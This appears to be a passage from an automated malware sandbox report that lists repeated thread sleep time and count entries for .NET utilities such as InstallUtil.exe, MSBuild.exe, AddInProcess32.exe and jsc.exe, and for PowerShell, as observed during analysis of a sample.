                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -595016s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -594906s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -594797s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -594687s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -594530s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -594271s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -594126s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -593984s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -593856s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -593275s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -592797s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -592584s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99871s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99735s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99609s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99484s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99336s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99087s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -98281s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -97299s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -97138s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -96763s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -96636s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -96524s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -96415s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -95248s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -95140s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -94989s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -94859s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -94749s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -94640s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -587093s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99782s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99657s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99532s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99407s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99227s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99125s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99016s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -98891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -98782s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -98657s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -98532s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -98380s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -98251s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -98126s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -97980s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -97874s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -97680s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -97563s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -97376s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep count: 40 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -36893488147419080s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6024Thread sleep count: 8102 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -599875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -599765s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6024Thread sleep count: 1604 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -599647s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -599532s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -599407s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -599293s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -599172s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -599052s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -598935s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -598813s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -598688s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -598563s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99855s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99542s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99413s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99263s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99139s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99029s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -98907s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -98797s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -98688s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -98563s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -98438s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -98313s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -98188s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -98077s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -97965s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -97850s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -97731s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -97614s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -97490s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -97350s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -97184s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -97068s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -96938s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -96823s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -96672s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -96546s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -96385s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -96252s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -96120s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -96000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -95872s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -95759s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -95651s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -95528s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -95407s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -95297s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -95183s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -94986s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -593306s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -593178s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99860s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99719s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99555s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99448s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99328s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99219s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99094s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -98984s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -98875s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8248Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep count: 33 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -30437127721620741s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8376Thread sleep count: 6495 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -599890s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -599704s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -599477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -599349s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -599078s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -598953s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -598774s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99732s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99625s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8376Thread sleep count: 3120 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99516s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99391s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99266s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99156s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99047s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -98937s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -98828s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -98708s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -98578s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -98468s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -98359s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -98250s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -98140s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -98031s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -97922s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -97812s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -97700s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -97578s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -97468s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -97346s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -97219s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -97109s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -96980s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -96859s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -96750s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -96634s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -96516s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -96406s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -96297s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -96121s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -96013s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -95891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -95766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -95656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -95543s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -95432s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -594000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -593873s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -99869s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -99741s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -99606s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -99464s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -99332s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -99174s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -99034s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -98266s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -96985s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -96808s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -96664s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -96500s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -96368s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -96155s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -95961s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -95824s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -95655s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -95524s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -95386s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -95261s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -95148s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -95029s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -94919s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -94802s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -94675s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -94555s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8888 Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8868 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep count: 36 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -33204139332677172s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8984 Thread sleep count: 6268 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -599838s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -599709s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -599567s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -599429s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -599216s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -599023s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -598886s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -598717s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -99876s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -99750s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -99613s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -99484s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -99322s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -99192s >= -30000s
